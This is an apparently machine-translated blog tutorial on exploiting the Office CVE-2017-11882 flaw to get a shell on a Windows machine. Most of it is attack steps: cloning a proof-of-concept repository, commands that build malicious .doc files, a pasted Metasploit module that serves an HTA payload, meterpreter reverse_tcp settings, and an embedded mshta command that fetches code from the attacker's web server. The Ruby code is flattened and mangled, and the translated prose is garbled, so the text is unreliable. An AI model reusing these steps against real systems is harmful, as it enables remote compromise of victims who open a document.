Office exploit-Get shell

Environment:

Kali system, Windows system

Process:

In the Kali system generated by the use of files, Kali system listening to the local port, Windows system open DOC file, you can recruit

　　

The first method of use, suitable for testing:

Download code from git:

git clone https://github.com/ridter/cve-2017-11882

Execute the following code to generate a doc in the current directory:

Python command_cve--11882"cmd.exe/c calc.exe" -o Test.doc

Generates a Test.doc file, and if a vulnerable computer opens the file, a calculator will pop up;

The second way to use the rebound is to get the shell:

Kali System Preparation:

Copy the following Ruby code to /usr/share/metasploit-framework/modules/exploits/windows/smb/cve_2017_11882.rb Directory (note the code indentation OH):

# # # This module requires metasploit:https://metasploit.com/download# current source:https://github.com/rapid7/ metasploit-framework## class Metasploitmodule < Msf::exploit::remote Rank = normalranking include Msf::exploit::re Mote::httpserver def initialize (info = {}) Super (Update_info (info, ' Name ' = ' Microsoft Office Payload deliv Ery ', ' Description ' =%q{This module generates an command to place within a Word document, that WH En executed, would retrieve a HTA payload via HTTP from a Web server.      Currently has not figured off how to generate a doc.        }, ' License ' = + msf_license, ' Arch ' = arch_x86, ' Platform ' = ' win ', ' Targets ' [[' Automatic ', {}],], ' defaulttarget ' = 0,) ' End def On_request_uri (CLI, _request) p Rint_status ("Delivering payload") P = regenerate_payload (CLI) data = MSF::UTIL::EXE.TO_EXECUTABLE_FMT (framewor K, Arch_X86, ' win ', p.encoded, ' Hta-psh ', {: Arch = arch_x86,:p latform = ' Win '}) send_respons E (CLI, data, ' content-type ' = ' Application/hta ') end def primer url = Get_uri print_status ("Place the follow ing DDE in an MS document: ") print_line (" Mshta.exe \ "#{url}\" ") endend

To start the MSF service on the command line:

Service PostgreSQL Start

Start MSF again:

sudo msfconsole

Reload All modules:

Reload_all

Find the cve_2017_11882 module we just created:

Search cve_2017_11882

Load this module:

Using Bounce Shellcode, configure the native address, configure the URI address

set payload windows/meterpreter/reverse_tcpset192.168. 0.105 Set Uripath Aaaaexploit

Generating exploit files Test1.doc

The implementation uses Ifconfig to find the current computer IP, and then executes the following command under Clone down project, the current system generates a Test1.doc file:

Python command109b_cve--11882"mshta http://192.168.0.108/aaaa" - o Test1.doc

(Note that the name AAAA is the same as the MSF Uripath and cannot be scrambled)

By placing the generated Test1.doc in the window system, MSF returns a shell

Related resources:

POC Project address: https://github.com/Ridter/CVE-2017-11882/

 python command_cve- 2017  - 11882.  PY - C  cmd.exe/c calc.exe "  - o test.doc 
 
 

NONO
Source: http://www.cnblogs.com/diligenceday/
Enterprise Website: http://www.idrwl.com/
Open Source Blog: Http://www.github.com/sqqihao
QQ: 287101329
: 18101055830

Office exploit-Get shell